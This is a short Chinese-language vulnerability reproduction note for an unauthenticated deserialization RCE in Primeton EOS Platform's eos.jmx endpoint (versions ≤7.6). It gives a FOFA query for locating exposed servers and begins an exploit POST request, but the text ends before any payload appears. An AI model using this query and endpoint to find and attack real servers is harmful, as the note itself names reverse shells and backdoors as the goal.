0x01 产品简介
普元 EOS Platform是普元信息技术股份有限公司推出的一款集成了低代码开发、微服务应用、开发运维一体化等功能的企业级应用开发平台。它帮助企业实现软件开发、运维一体化管理,提升IT运营效率和业务响应速度。
0x02 漏洞概述
普元EOS Platform 中间件 eos.jmx 接口存在反序列化漏洞,未经身份验证的攻击者可利用此漏洞执行任意代码,反弹shell或者写入后门文件,进一步可获取服务器权限。
0x03 影响范围
Primeton EOS Platform version ≤ 7.6
0x04 复现环境
FOFA:body="普元" || (body="ame.primeton.com" && body="eos-web")
0x05 漏洞复现
Exp
POST /workspace/frame/permission/common/eos.jmx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53